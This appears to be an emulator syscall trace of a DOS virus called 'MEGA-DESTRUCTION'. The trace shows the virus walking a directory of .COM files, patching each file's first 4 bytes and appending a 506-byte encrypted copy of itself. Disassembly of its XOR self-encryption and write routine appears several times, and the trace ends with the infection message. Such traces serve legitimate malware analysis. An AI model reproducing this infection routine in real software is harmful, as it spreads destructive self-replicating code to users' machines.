.
| Time |
Syscall Op |
Syscall Name |
| 2018-12-17T21:59:16.165925039Z | 26 | PC: 12a73 | Set disk transfer address |
| 2018-12-17T21:59:16.168118067Z | 37 | PC: 12a81 | Set interrupt vector (Interrupt = '1' AKA 'Character input') |
| 2018-12-17T21:59:16.169271504Z | 37 | PC: 12a85 | Set interrupt vector (Interrupt = '3' AKA 'Auxiliary input') |
| 2018-12-17T21:59:16.170952302Z | 78 | PC: 12ad1 | Find first file |
| 2018-12-17T21:59:16.17746991Z | 61 | PC: 12bce | Open file (Filename = 'SLEEP.COM') |
| 2018-12-17T21:59:16.184054702Z | 63 | PC: 12bdd | Read file or device (Read 4 bytes on handle 5) |
| 2018-12-17T21:59:16.190130673Z | 66 | PC: 12bec | Move file pointer |
| 2018-12-17T21:59:16.193705856Z | 66 | PC: 12bfb | Move file pointer |
| 2018-12-17T21:59:16.195209768Z | 64 | PC: 12c07 | Write file or device (Write 4 bytes on handle 5) |
| 2018-12-17T21:59:16.197997408Z | 66 | PC: 12c13 | Move file pointer |
| 2018-12-17T21:59:16.201018485Z | 44 | PC: 12c17 | Get time 0x12c17: mov byte ptr [bp + 0x1fa], dl
0x12c1b: call 0x12c31
0x12c1e: mov ah, 0x40
0x12c20: mov cx, 0x1fa
0x12c23: lea dx, word ptr [bp + 6]
0x12c27: int 0x21
0x12c29: call 0x12c31
0x12c2c: mov ah, 0x3e
0x12c2e: int 0x21
0x12c30: ret
0x12c31: lea si, word ptr [bp + 0x20]
0x12c35: mov cx, 0x1bb
0x12c38: xor byte ptr [si], 0
0x12c3b: inc si
0x12c3c: dec cx
0x12c3d: jne 0x12c38
0x12c3f: ret
0x12c40: add word ptr [bx], di
0x12c42: aas
0x12c43: aas
|
| 2018-12-17T21:59:16.203285912Z | 64 | PC: 12c29 | Write file or device (Write 506 bytes on handle 5) |
| 2018-12-17T21:59:16.216871327Z | 62 | PC: 12c30 | Close file |
| 2018-12-17T21:59:16.225876607Z | 79 | PC: 12ad1 | Find next file |
| 2018-12-17T21:59:16.228438041Z | 61 | PC: 12bce | Open file (Filename = 'PRINT.COM') |
| 2018-12-17T21:59:16.234747808Z | 63 | PC: 12bdd | Read file or device (Read 4 bytes on handle 5) |
| 2018-12-17T21:59:16.241633261Z | 66 | PC: 12bec | Move file pointer |
| 2018-12-17T21:59:16.243904123Z | 66 | PC: 12bfb | Move file pointer |
| 2018-12-17T21:59:16.246328311Z | 64 | PC: 12c07 | Write file or device (Write 4 bytes on handle 5) |
| 2018-12-17T21:59:16.249802995Z | 66 | PC: 12c13 | Move file pointer |
| 2018-12-17T21:59:16.252168327Z | 44 | PC: 12c17 | Get time 0x12c17: mov byte ptr [bp + 0x1fa], dl
0x12c1b: call 0x12c31
0x12c1e: mov ah, 0x40
0x12c20: mov cx, 0x1fa
0x12c23: lea dx, word ptr [bp + 6]
0x12c27: int 0x21
0x12c29: call 0x12c31
0x12c2c: mov ah, 0x3e
0x12c2e: int 0x21
0x12c30: ret
0x12c31: lea si, word ptr [bp + 0x20]
0x12c35: mov cx, 0x1bb
0x12c38: xor byte ptr [si], 0x3a
0x12c3b: inc si
0x12c3c: dec cx
0x12c3d: jne 0x12c38
0x12c3f: ret
0x12c40: add word ptr [bx], di
0x12c42: aas
0x12c43: aas
|
| 2018-12-17T21:59:16.254828014Z | 64 | PC: 12c29 | Write file or device (Write 506 bytes on handle 5) |
| 2018-12-17T21:59:16.263129596Z | 62 | PC: 12c30 | Close file |
| 2018-12-17T21:59:16.273051978Z | 79 | PC: 12ad1 | Find next file |
| 2018-12-17T21:59:16.276983971Z | 61 | PC: 12bce | Open file (Filename = 'HELLO.COM') |
| 2018-12-17T21:59:16.283645839Z | 63 | PC: 12bdd | Read file or device (Read 4 bytes on handle 5) |
| 2018-12-17T21:59:16.290394915Z | 66 | PC: 12bec | Move file pointer |
| 2018-12-17T21:59:16.292281133Z | 66 | PC: 12bfb | Move file pointer |
| 2018-12-17T21:59:16.294428473Z | 64 | PC: 12c07 | Write file or device (Write 4 bytes on handle 5) |
| 2018-12-17T21:59:16.298412741Z | 66 | PC: 12c13 | Move file pointer |
| 2018-12-17T21:59:16.300252208Z | 44 | PC: 12c17 | Get time 0x12c17: mov byte ptr [bp + 0x1fa], dl
0x12c1b: call 0x12c31
0x12c1e: mov ah, 0x40
0x12c20: mov cx, 0x1fa
0x12c23: lea dx, word ptr [bp + 6]
0x12c27: int 0x21
0x12c29: call 0x12c31
0x12c2c: mov ah, 0x3e
0x12c2e: int 0x21
0x12c30: ret
0x12c31: lea si, word ptr [bp + 0x20]
0x12c35: mov cx, 0x1bb
0x12c38: xor byte ptr [si], 0x3f
0x12c3b: inc si
0x12c3c: dec cx
0x12c3d: jne 0x12c38
0x12c3f: ret
0x12c40: add word ptr [bx], di
0x12c42: aas
0x12c43: aas
|
| 2018-12-17T21:59:16.302977488Z | 64 | PC: 12c29 | Write file or device (Write 506 bytes on handle 5) |
| 2018-12-17T21:59:16.311288697Z | 62 | PC: 12c30 | Close file |
| 2018-12-17T21:59:16.320033085Z | 79 | PC: 12ad1 | Find next file |
| 2018-12-17T21:59:16.322914389Z | 61 | PC: 12bce | Open file (Filename = 'PHANG.COM') |
| 2018-12-17T21:59:16.330643462Z | 63 | PC: 12bdd | Read file or device (Read 4 bytes on handle 5) |
| 2018-12-17T21:59:16.337095716Z | 66 | PC: 12bec | Move file pointer |
| 2018-12-17T21:59:16.338444515Z | 66 | PC: 12bfb | Move file pointer |
| 2018-12-17T21:59:16.340251654Z | 64 | PC: 12c07 | Write file or device (Write 4 bytes on handle 5) |
| 2018-12-17T21:59:16.342958305Z | 66 | PC: 12c13 | Move file pointer |
| 2018-12-17T21:59:16.344313725Z | 44 | PC: 12c17 | Get time 0x12c17: mov byte ptr [bp + 0x1fa], dl
0x12c1b: call 0x12c31
0x12c1e: mov ah, 0x40
0x12c20: mov cx, 0x1fa
0x12c23: lea dx, word ptr [bp + 6]
0x12c27: int 0x21
0x12c29: call 0x12c31
0x12c2c: mov ah, 0x3e
0x12c2e: int 0x21
0x12c30: ret
0x12c31: lea si, word ptr [bp + 0x20]
0x12c35: mov cx, 0x1bb
0x12c38: xor byte ptr [si], 0x3f
0x12c3b: inc si
0x12c3c: dec cx
0x12c3d: jne 0x12c38
0x12c3f: ret
0x12c40: add word ptr [bx], di
0x12c42: aas
0x12c43: aas
|
| 2018-12-17T21:59:16.346566966Z | 64 | PC: 12c29 | Write file or device (Write 506 bytes on handle 5) |
| 2018-12-17T21:59:16.355345523Z | 62 | PC: 12c30 | Close file |
| 2018-12-17T21:59:16.363355328Z | 79 | PC: 12ad1 | Find next file |
| 2018-12-17T21:59:16.365848008Z | 61 | PC: 12bce | Open file (Filename = 'PRINTA~1.COM') |
| 2018-12-17T21:59:16.372653533Z | 63 | PC: 12bdd | Read file or device (Read 4 bytes on handle 5) |
| 2018-12-17T21:59:16.378676359Z | 66 | PC: 12bec | Move file pointer |
| 2018-12-17T21:59:16.380665657Z | 66 | PC: 12bfb | Move file pointer |
| 2018-12-17T21:59:16.382524991Z | 64 | PC: 12c07 | Write file or device (Write 4 bytes on handle 5) |
| 2018-12-17T21:59:16.385058326Z | 66 | PC: 12c13 | Move file pointer |
| 2018-12-17T21:59:16.386290356Z | 44 | PC: 12c17 | Get time 0x12c17: mov byte ptr [bp + 0x1fa], dl
0x12c1b: call 0x12c31
0x12c1e: mov ah, 0x40
0x12c20: mov cx, 0x1fa
0x12c23: lea dx, word ptr [bp + 6]
0x12c27: int 0x21
0x12c29: call 0x12c31
0x12c2c: mov ah, 0x3e
0x12c2e: int 0x21
0x12c30: ret
0x12c31: lea si, word ptr [bp + 0x20]
0x12c35: mov cx, 0x1bb
0x12c38: xor byte ptr [si], 0x45
0x12c3b: inc si
0x12c3c: dec cx
0x12c3d: jne 0x12c38
0x12c3f: ret
0x12c40: add word ptr [bx], di
0x12c42: aas
0x12c43: aas
|
| 2018-12-17T21:59:16.3889194Z | 64 | PC: 12c29 | Write file or device (Write 506 bytes on handle 5) |
| 2018-12-17T21:59:16.396779527Z | 62 | PC: 12c30 | Close file |
| 2018-12-17T21:59:16.405125237Z | 79 | PC: 12ad1 | Find next file |
| 2018-12-17T21:59:16.408977753Z | 61 | PC: 12bce | Open file (Filename = 'MANDEL.COM') |
| 2018-12-17T21:59:16.415394142Z | 63 | PC: 12bdd | Read file or device (Read 4 bytes on handle 5) |
| 2018-12-17T21:59:16.421515406Z | 66 | PC: 12bec | Move file pointer |
| 2018-12-17T21:59:16.423757263Z | 66 | PC: 12bfb | Move file pointer |
| 2018-12-17T21:59:16.425510258Z | 64 | PC: 12c07 | Write file or device (Write 4 bytes on handle 5) |
| 2018-12-17T21:59:16.428669742Z | 66 | PC: 12c13 | Move file pointer |
| 2018-12-17T21:59:16.430834226Z | 44 | PC: 12c17 | Get time 0x12c17: mov byte ptr [bp + 0x1fa], dl
0x12c1b: call 0x12c31
0x12c1e: mov ah, 0x40
0x12c20: mov cx, 0x1fa
0x12c23: lea dx, word ptr [bp + 6]
0x12c27: int 0x21
0x12c29: call 0x12c31
0x12c2c: mov ah, 0x3e
0x12c2e: int 0x21
0x12c30: ret
0x12c31: lea si, word ptr [bp + 0x20]
0x12c35: mov cx, 0x1bb
0x12c38: xor byte ptr [si], 0x4a
0x12c3b: inc si
0x12c3c: dec cx
0x12c3d: jne 0x12c38
0x12c3f: ret
0x12c40: add word ptr [bx], di
0x12c42: aas
0x12c43: aas
|
| 2018-12-17T21:59:16.433183684Z | 64 | PC: 12c29 | Write file or device (Write 506 bytes on handle 5) |
| 2018-12-17T21:59:16.449947231Z | 62 | PC: 12c30 | Close file |
| 2018-12-17T21:59:16.459224825Z | 79 | PC: 12ad1 | Find next file |
| 2018-12-17T21:59:16.461969005Z | 61 | PC: 12bce | Open file (Filename = 'PAH.COM') |
| 2018-12-17T21:59:16.468524806Z | 63 | PC: 12bdd | Read file or device (Read 4 bytes on handle 5) |
| 2018-12-17T21:59:16.475388405Z | 66 | PC: 12bec | Move file pointer |
| 2018-12-17T21:59:16.476699971Z | 66 | PC: 12bfb | Move file pointer |
| 2018-12-17T21:59:16.477922566Z | 64 | PC: 12c07 | Write file or device (Write 4 bytes on handle 5) |
| 2018-12-17T21:59:16.480823775Z | 66 | PC: 12c13 | Move file pointer |
| 2018-12-17T21:59:16.482083531Z | 44 | PC: 12c17 | Get time 0x12c17: mov byte ptr [bp + 0x1fa], dl
0x12c1b: call 0x12c31
0x12c1e: mov ah, 0x40
0x12c20: mov cx, 0x1fa
0x12c23: lea dx, word ptr [bp + 6]
0x12c27: int 0x21
0x12c29: call 0x12c31
0x12c2c: mov ah, 0x3e
0x12c2e: int 0x21
0x12c30: ret
0x12c31: lea si, word ptr [bp + 0x20]
0x12c35: mov cx, 0x1bb
0x12c38: xor byte ptr [si], 0x4a
0x12c3b: inc si
0x12c3c: dec cx
0x12c3d: jne 0x12c38
0x12c3f: ret
0x12c40: add word ptr [bx], di
0x12c42: aas
0x12c43: aas
|
| 2018-12-17T21:59:16.484190801Z | 64 | PC: 12c29 | Write file or device (Write 506 bytes on handle 5) |
| 2018-12-17T21:59:16.49314669Z | 62 | PC: 12c30 | Close file |
| 2018-12-17T21:59:16.501011116Z | 79 | PC: 12ad1 | Find next file |
| 2018-12-17T21:59:16.503333385Z | 59 | PC: 12ae2 | Change current directory |
| 2018-12-17T21:59:16.508254033Z | 26 | PC: 12aeb | Set disk transfer address |
| 2018-12-17T21:59:16.509191775Z | 9 | PC: 12afd | Display string (String= 'You computher is now infected with:
MEGA-DESTRUCTION�
The Conjurers....
') |
| 2018-12-17T21:59:16.525639308Z | 61 | PC: 12bce | Open file (Filename = '') |
| 2018-12-17T21:59:16.528322561Z | 1 | PC: 12ad1 | Character input |
